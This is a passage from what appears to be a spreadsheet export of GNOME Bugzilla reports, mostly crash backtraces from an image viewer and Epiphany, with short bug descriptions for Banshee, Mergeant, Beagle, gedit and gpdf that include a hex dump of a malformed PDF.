#4  0x40ba9300 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x40b2a06f in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 49156 (LWP 4304)):
#0  0x40c9fce2 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40b2c6df in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40b29173 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x0809fd9f in image_loader_set_pixbuf ()
No symbol table info available.
#4  0x40ba9300 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x40b2a06f in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 32771 (LWP 4303)):
#0  0x40c9fce2 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40b2c6df in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40b29173 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x0809fd9f in image_loader_set_pixbuf ()
No symbol table info available.
#4  0x40ba9300 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x40b2a06f in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 16386 (LWP 4302)):
#0  0x40c9fce2 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40b2c6df in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40b29173 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x0809fd9f in image_loader_set_pixbuf ()
No symbol table info available.
#4  0x40ba9300 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x40b2a06f in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 32769 (LWP 4301)):
#0  0x40d36320 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x40b29daa in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 16384 (LWP 4300)):
#0  0x40d14269 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40d873c4 in sys_sigabbrev () from /lib/libc.so.6
No symbol table info available.
#2  0x40b2ec75 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40095723 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x40b305a7 in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  0x40c9fbd8 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x08064f81 in tools_convert_format_command_impl ()
No symbol table info available.
#7  0x40110c45 in bonobo_socket_add_id () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#8  0x40af0e1b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x4067dc7b in bonobo_closure_invoke_va_list ()
   from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#10 0x4067de91 in bonobo_closure_invoke () from
/usr/lib/libbonobo-2.so.0
No symbol table info available.
#11 0x40110ac1 in bonobo_socket_add_id () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#12 0x40681453 in Bonobo_UIComponent_execVerb () from
/usr/lib/libbonobo-2.so.0
No symbol table info available.
#13 0x4011696b in bonobo_ui_engine_get_ui_container ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#14 0x40116b21 in bonobo_ui_engine_get_ui_container ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#15 0x40b060e2 in g_cclosure_marshal_VOID__POINTER ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x40af11f5 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0x40af0e1b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x40b04d7a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x40b031fa in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x40b034a5 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0x40118c1f in bonobo_ui_engine_emit_verb_on_w ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#22 0x4011d58c in bonobo_ui_sync_menu_add_popup ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#23 0x40b05786 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#24 0x40af0e1b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x40b04983 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x40b031fa in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#27 0x407d1faf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#28 0x4085250c in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0x407a85fa in gtk_menu_shell_activate_item ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#30 0x407a7abb in _gtk_menu_shell_activate () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0x4079cd82 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0x40af11f5 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#33 0x40af0e1b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0x40b04d7a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0x40b03267 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#36 0x407d1faf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#37 0x4085243d in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#38 0x408520a0 in gtk_widget_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#39 0x4079cc33 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0x4079bc3e in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#41 0x4091a0dc in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#42 0x40b93b29 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#43 0x40b94947 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#44 0x40b94d23 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#45 0x40b953ff in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#46 0x4066f9df in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#47 0x08088374 in main ()
No symbol table info available.
#48 0x40c8ea5f in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x40d14269 in wait4 () from /lib/libc.so.6
-- 
Fabio
_____________________________________________________________________
Envie de discuter en live avec vos amis ? TÃ©lÃ©charger MSN Messenger
http://www.ifrance.com/_reloc/m la 1Ã¨re messagerie instantanÃ©e de France
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-12-13 08:59 -------
The original reporter (farnis@libero.it) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component paolo.bacch@tin.it.
</t>
  </si>
  <si>
    <t>farnis</t>
  </si>
  <si>
    <t>BANSHEE-400215</t>
  </si>
  <si>
    <t>Segmentation Fault after rating mp3s</t>
  </si>
  <si>
    <t>After rating a mp3 banshee closes immediatly or within the next 10 seconds. I'm using banshee 0.11.4 and already tried the newest mono version.
I think it's only happening in the main window rating column. Edit Song Metadata  works fine...</t>
  </si>
  <si>
    <t>EPIPHANY-172882</t>
  </si>
  <si>
    <t>crash in gtk_widget_unparent</t>
  </si>
  <si>
    <t xml:space="preserve"> chpe: click the screenshot on http://www.datux.nl/
 then close the window
 =&gt; segfault
..
 chpe: yes but it's different the window auto-closes when I move the
cursor and ephy only crashes when I do Ctrl+W
backtrace:
Backtrace was generated from '/usr/bin/epiphany'
(no debugging symbols found)
Using host libthread_db library /lib/tls/libthread_db.so.1.
(no debugging symbols found)
`system-supplied DSO at 0xffffe000' has disappeared keeping its symbols.
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1224150368 (LWP 20775)]
[New Thread -1294304336 (LWP 20782)]
[New Thread -1285915728 (LWP 20781)]
[New Thread -1277527120 (LWP 20780)]
[New Thread -1269138512 (LWP 20779)]
[New Thread -1259492432 (LWP 20778)]
[New Thread -1250993232 (LWP 20777)]
[New Thread -1234519120 (LWP 20776)]
0xb7c3dfc1 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#0  0xb7c3dfc1 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0xb7e18df2 in libgnomeui_segv_handle (signum=11) at gnome-ui-init.c:741
#2  0xb7fba8d1 in nsProfileLock::FatalSignalHandler ()
   from /usr/lib/mozilla-firefox/libgtkembedmoz.so
#3  
#4  0xb7ad3447 in IA__gtk_widget_unparent (widget=0x898b538)
    at gtkwidget.c:1880
#5  0xb7a0a489 in gtk_notebook_real_remove (notebook=0x8a666f0 
    list=0x8a116d8 destroying=0) at gtknotebook.c:2670
#6  0xb7a0d4a4 in IA__gtk_notebook_remove_page (notebook=0x8a666f0 
    page_num=0) at gtknotebook.c:4435
#7  0x08091bf9 in ephy_notebook_remove_tab ()
#8  0x0807ce86 in ephy_window_remove_tab ()
#9  0x0808459c in window_cmd_file_close_window ()
#10 0xb77cec9a in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#11 0xb77be351 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#12 0xb77ce7e2 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#13 0xb77cd8f1 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#14 0xb77cdb75 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#15 0xb792c57b in _gtk_action_emit_activate (action=0x8975a38)
    at gtkaction.c:1035
#16 0xb792cf19 in closure_accel_activate (closure=0x89761a0 
    return_value=0x4 n_param_values=4 param_values=0xbffff2e0 
    invocation_hint=0xbffff1c8 marshal_data=0x0) at gtkaction.c:1427
#17 0xb77be351 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#18 0xb77ce7e2 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#19 0xb77cd6ef in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#20 0xb77cdb75 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#21 0xb7927355 in IA__gtk_accel_group_activate (accel_group=0x8906488 
    accel_quark=4 acceleratable=0x89901b0 accel_key=4 
    accel_mods=GDK_CONTROL_MASK) at gtkaccelgroup.c:766
#22 0xb792744c in IA__gtk_accel_groups_activate (object=0x89901b0 
    accel_key=119 accel_mods=GDK_CONTROL_MASK) at gtkaccelgroup.c:804
#23 0xb7ae4c0e in IA__gtk_window_activate_key (window=0x89901b0 
    event=0x85c6d00) at gtkwindow.c:7359
#24 0xb7ae19d0 in gtk_window_key_press_event (widget=0x89901b0 
    event=0x85c6d00) at gtkwindow.c:4455
#25 0x08076b4a in ephy_window_get_type ()
#26 0xb79f3bca in _gtk_marshal_BOOLEAN__BOXED (closure=0x89901b0 
    return_value=0xbffff680 n_param_values=2 param_values=0xd 
    invocation_hint=0xbffff6a8 marshal_data=0x8076abc) at gtkmarshalers.c:83
#27 0xb77be5bf in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
#28 0xb77be351 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#29 0xb77ce270 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#30 0xb77cd6ef in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#31 0xb77cdb75 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#32 0xb7ad5a11 in gtk_widget_event_internal (widget=0x89901b0 
    event=0x85c6d00) at gtkwidget.c:3631
#33 0xb79f2884 in IA__gtk_propagate_event (widget=0x89901b0 event=0x85c6d00)
    at gtkmain.c:2119
#34 0xb79f17bb in IA__gtk_main_do_event (event=0x85c6d00) at gtkmain.c:1383
#35 0xb789eb0b in gdk_event_dispatch (source=0x4 callback=0 user_data=0x0)
    at gdkevents-x11.c:2220
#36 0xb75b8d0f in g_main_depth () from /usr/lib/libglib-2.0.so.0
#37 0xb75b9cb5 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#38 0xb75b9fd7 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#39 0xb75ba51e in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#40 0xb79f110f in IA__gtk_main () at gtkmain.c:963
#41 0x0806ef68 in main ()
Thread 8 (Thread -1234519120 (LWP 20776)):
#0  0xb744da0f in poll () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb7edad57 in PR_OpenDir () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#2  0xb6bbca8c in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#3  0xb6bbd010 in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#4  0xb7f6ecbf in nsThread::Main () from /usr/lib/mozilla-firefox/libxpcom.so
No symbol table info available.
#5  0xb7edc232 in PR_Select () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#6  0xb7c389c8 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0xb7455ffa in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 7 (Thread -1250993232 (LWP 20777)):
#0  0xb7c3b070 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7ed6ed9 in PR_Unlock () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#2  0xb7ed70b2 in PR_WaitCondVar () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#3  0xb7f71461 in TimerThread::UpdateFilter ()
   from /usr/lib/mozilla-firefox/libxpcom.so
No symbol table info available.
#4  0xb7f6ecbf in nsThread::Main () from /usr/lib/mozilla-firefox/libxpcom.so
No symbol table info available.
#5  0xb7edc232 in PR_Select () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#6  0xb7c389c8 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0xb7455ffa in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 6 (Thread -1259492432 (LWP 20778)):
#0  0xb7c3b070 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7ed6ed9 in PR_Unlock () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#2  0xb7ed70b2 in PR_WaitCondVar () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#3  0xb6bc8b71 in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#4  0xb6bc8d7a in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#5  0xb7edc232 in PR_Select () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#6  0xb7c389c8 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0xb7455ffa in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 5 (Thread -1269138512 (LWP 20779)):
#0  0xb7c3b070 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7ed6ed9 in PR_Unlock () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#2  0xb7ed70b2 in PR_WaitCondVar () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#3  0xb6b9ead9 in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#4  0xb7edc232 in PR_Select () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#5  0xb7c389c8 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0xb7455ffa in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread -1277527120 (LWP 20780)):
#0  0xb7c3b070 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7ed6ed9 in PR_Unlock () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#2  0xb7ed70b2 in PR_WaitCondVar () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#3  0xb6b9ead9 in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#4  0xb7edc232 in PR_Select () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#5  0xb7c389c8 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0xb7455ffa in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread -1285915728 (LWP 20781)):
#0  0xb7c3b070 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7ed6ed9 in PR_Unlock () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#2  0xb7ed70b2 in PR_WaitCondVar () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#3  0xb6b9ead9 in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#4  0xb7edc232 in PR_Select () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#5  0xb7c389c8 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0xb7455ffa in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread -1294304336 (LWP 20782)):
#0  0xb7c3b070 in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7ed6ed9 in PR_Unlock () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#2  0xb7ed70b2 in PR_WaitCondVar () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#3  0xb6b9ead9 in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#4  0xb7edc232 in PR_Select () from /usr/lib/mozilla-firefox/libnspr4.so
No symbol table info available.
#5  0xb7c389c8 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0xb7455ffa in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1224150368 (LWP 20775)):
#0  0xb7c3dfc1 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7e18df2 in libgnomeui_segv_handle (signum=11) at gnome-ui-init.c:741
	estatus = -1073747948
	eret = -1208046968
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {3070824640 1 0 3086643576 3086920328 72 
      3086968079 3086920740 3086737776 442 3075136416 3075133944 
      3075136416 136488808 3221219372 3074370569 3075136416 136488808 
      3086736884 136978144 11 3221219404 3086725839 136488808 
      3086968624 0 0 3086736884 3086736492 3221219436 3086723173 
      136978144}} sa_flags = -1207998672 sa_restorer = 0}
	pid = 20791
#2  0xb7fba8d1 in nsProfileLock::FatalSignalHandler ()
   from /usr/lib/mozilla-firefox/libgtkembedmoz.so
No symbol table info available.
#3  
No symbol table info available.
#4  0xb7ad3447 in IA__gtk_widget_unparent (widget=0x898b538)
    at gtkwidget.c:1880
	nqueue = (GObjectNotifyQueue *) 0x8a116e4
	toplevel = (GtkWidget *) 0x89901b0
	old_parent = (GtkWidget *) 0x8857b88
#5  0xb7a0a489 in gtk_notebook_real_remove (notebook=0x8a666f0 
    list=0x8a116d8 destroying=0) at gtknotebook.c:2670
	page = (GtkNotebookPage *) 0x8857b88
	next_list = (GList *) 0x8857b88
	need_resize = 1
#6  0xb7a0d4a4 in IA__gtk_notebook_remove_page (notebook=0x8a666f0 
    page_num=0) at gtknotebook.c:4435
	list = (GList *) 0x4
#7  0x08091bf9 in ephy_notebook_remove_tab ()
No symbol table info available.
#8  0x0807ce86 in ephy_window_remove_tab ()
No symbol table info available.
#9  0x0808459c in window_cmd_file_close_window ()
No symbol table info available.
#10 0xb77cec9a in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0xb77be351 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0xb77ce7e2 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0xb77cd8f1 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0xb77cdb75 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0xb792c57b in _gtk_action_emit_activate (action=0x8975a38)
    at gtkaction.c:1035
	group = (GtkActionGroup *) 0x87b90b0
#16 0xb792cf19 in closure_accel_activate (closure=0x89761a0 
    return_value=0x4 n_param_values=4 param_values=0xbffff2e0 
    invocation_hint=0xbffff1c8 marshal_data=0x0) at gtkaction.c:1427
No locals.
#17 0xb77be351 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0xb77ce7e2 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0xb77cd6ef in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0xb77cdb75 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0xb7927355 in IA__gtk_accel_group_activate (accel_group=0x8906488 
    accel_quark=4 acceleratable=0x89901b0 accel_key=4 
    accel_mods=GDK_CONTROL_MASK) at gtkaccelgroup.c:766
	was_handled = 0
#22 0xb792744c in IA__gtk_accel_groups_activate (object=0x89901b0 
    accel_key=119 accel_mods=GDK_CONTROL_MASK) at gtkaccelgroup.c:804
	accel_name = (gchar *) 0x881d5a0 Â¨N\022\b %Â¨\bÂ¸Ã˜\237\b
	accel_quark = 1500
	slist = (GSList *) 0x881d5a0
#23 0xb7ae4c0e in IA__gtk_window_activate_key (window=0x89901b0 
    event=0x85c6d00) at gtkwindow.c:7359
	entry = (GtkWindowKeyEntry *) 0xe0
	entries = (GSList *) 0x4
	tmp_list = (GSList *) 0x0
	key_hash = (GtkKeyHash *) 0x0
	found_entry = (GtkWindowKeyEntry *) 0x8a62118
#24 0xb7ae19d0 in gtk_window_key_press_event (widget=0x89901b0 
    event=0x85c6d00) at gtkwindow.c:4455
	handled = 4
#25 0x08076b4a in ephy_window_get_type ()
No symbol table info available.
#26 0xb79f3bca in _gtk_marshal_BOOLEAN__BOXED (closure=0x89901b0 
    return_value=0xbffff680 n_param_values=2 param_values=0xd 
    invocation_hint=0xbffff6a8 marshal_data=0x8076abc) at gtkmarshalers.c:83
	callback = 0
	data1 = 0x89901b0
	data2 = 0x4
	v_return = 4
#27 0xb77be5bf in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0xb77be351 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0xb77ce270 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#30 0xb77cd6ef in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#31 0xb77cdb75 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#32 0xb7ad5a11 in gtk_widget_event_internal (widget=0x89901b0 
    event=0x85c6d00) at gtkwidget.c:3631
	signal_num = 4
	return_val = 0
#33 0xb79f2884 in IA__gtk_propagate_event (widget=0x89901b0 event=0x85c6d00)
    at gtkmain.c:2119
	window = (GtkWidget *) 0x89901b0
	handled_event = 140274944
#34 0xb79f17bb in IA__gtk_main_do_event (event=0x85c6d00) at gtkmain.c:1383
	event_widget = (GtkWidget *) 0x89901b0
	grab_widget = (GtkWidget *) 0x89901b0
	window_group = (GtkWindowGroup *) 0x8304d68
	next_event = (GdkEvent *) 0x0
	rewritten_event = (GdkEvent *) 0x0
	tmp_list = (GList *) 0x89901b0
#35 0xb789eb0b in gdk_event_dispatch (source=0x4 callback=0 user_data=0x0)
    at gdkevents-x11.c:2220
	display = (GdkDisplay *) 0x85c6d00
	event = (GdkEvent *) 0x85c6d00
#36 0xb75b8d0f in g_main_depth () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#37 0xb75b9cb5 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#38 0xb75b9fd7 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#39 0xb75ba51e in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#40 0xb79f110f in IA__gtk_main () at gtkmain.c:963
	tmp_list = (GList *) 0x0
	functions = (GList *) 0x0
	init = (GtkInitFunction *) 0x0
	loop = (GMainLoop *) 0x8172880
#41 0x0806ef68 in main ()
No symbol table info available.
#0  0xb7c3dfc1 in __waitpid_nocancel () from /lib/tls/libpthread.so.0</t>
  </si>
  <si>
    <t>MERGEANT-500758</t>
  </si>
  <si>
    <t>MERGEANT</t>
  </si>
  <si>
    <t>Missing file from ALL_LINGUAS in configure file</t>
  </si>
  <si>
    <t>Punjabi language file (http://l10n.gnome.org/POT/mergeant.HEAD/mergeant.HEAD.pa.po) is listed by http://l10n.gnome.org/module/mergeant as missing from ALL_LINGUAS in configure file. Please fix it.</t>
  </si>
  <si>
    <t>malerba</t>
  </si>
  <si>
    <t>mailbox.tec</t>
  </si>
  <si>
    <t>BEAGLE-332673</t>
  </si>
  <si>
    <t>support wildcard query: search on foo should also match barfoobar</t>
  </si>
  <si>
    <t>Nautilus search not built against beagle (presumably just find -name \*foo\*) finds jonathanzittrain.jpg when I search for 'zittrain'. Beagle does not and should.</t>
  </si>
  <si>
    <t>GEDIT-106677</t>
  </si>
  <si>
    <t>Farsi should be changed to Persian</t>
  </si>
  <si>
    <t>In gedit/gedit-encodings.c the Persian language is mentioned as Farsi (a
transcription of the name of the language in Persian). It should be changed
to Persian.</t>
  </si>
  <si>
    <t>GEDIT-338173</t>
  </si>
  <si>
    <t>Gedit show keyring store password on the window title bar</t>
  </si>
  <si>
    <t>Forwarded from: https://launchpad.net/distros/ubuntu/+source/gedit/+bug/39120
I have a smb folder with its username and password stored in gnome-keyring. When i open a file with gedit the password is exposed in the window titlebar such as: filename smb://pw%3busename@server/folder. I think that this should not happen since that password can be saw by everyone is looking my monitor.</t>
  </si>
  <si>
    <t>EVINCE-171588</t>
  </si>
  <si>
    <t>should give better diagnosis of documents with no pages</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 3 (Heidelberg)
Package: gpdf
Severity: normal
Version: GNOME2.8.0 unspecified
Gnome-Distributor: Red Hat Inc
Synopsis: gpdf crashes when given the following PDF
Bugzilla-Product: gpdf
Bugzilla-Component: general
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.8.0)
Description:
Description of the crash:
(gpdf:12751): Bonobo-CRITICAL **: file bonobo-control-frame.c: line 539
(bonobo_control_frame_control_deactivate): assertion
`frame-&gt;priv-&gt;control != CORBA_OBJECT_NIL' failed
Steps to reproduce the crash:
1. attempt to view a certain file
2. 
3. 
Expected Results:
An error dialog informing me that the file is not well-formed?
How often does this happen?
every time!
Additional Information:
Here's the file in binary form...
[richard@biostar music]$ od -x test.pdf
0000000 5025 4644 312d 322e 250a ecc7 a28f 330a
0000020 3020 6f20 6a62 3c0a 203c 542f 7079 2065
0000040 502f 6761 7365 2f20 694b 7364 5b20 5d0a
0000060 2f20 6f43 6e75 2074 0a30 3e3e 650a 646e
0000100 626f 0a6a 2031 2030 626f 0a6a 3c3c 542f
0000120 7079 2065 432f 7461 6c61 676f 2f20 6150
0000140 6567 2073 2033 2030 0a52 3e3e 650a 646e
0000160 626f 0a6a 2032 2030 626f 0a6a 3c3c 502f
0000200 6f72 7564 6563 2872 4e47 2055 6847 736f
0000220 7374 7263 7069 2074 2e37 3730 3e29 653e
0000240 646e 626f 0a6a 7278 6665 300a 3420 300a
0000260 3030 3030 3030 3030 2030 3536 3335 2035
0000300 2066 300a 3030 3030 3030 3630 2038 3030
0000320 3030 2030 206e 300a 3030 3030 3030 3131
0000340 2036 3030 3030 2030 206e 300a 3030 3030
0000360 3030 3130 2035 3030 3030 2030 206e 740a
0000400 6172 6c69 7265 3c0a 203c 532f 7a69 2065
0000420 2034 522f 6f6f 2074 2031 2030 2052 492f
0000440 666e 206f 2032 2030 0a52 3e3e 730a 6174
0000460 7472 7278 6665 310a 3636 250a 4525 464f
0000500 000a
0000501
------- Bug moved to this database by unknown@bugzilla.gnome.org 2005-03-25 09:45 -------
Unknown platform unknown. Setting to default platform Other.
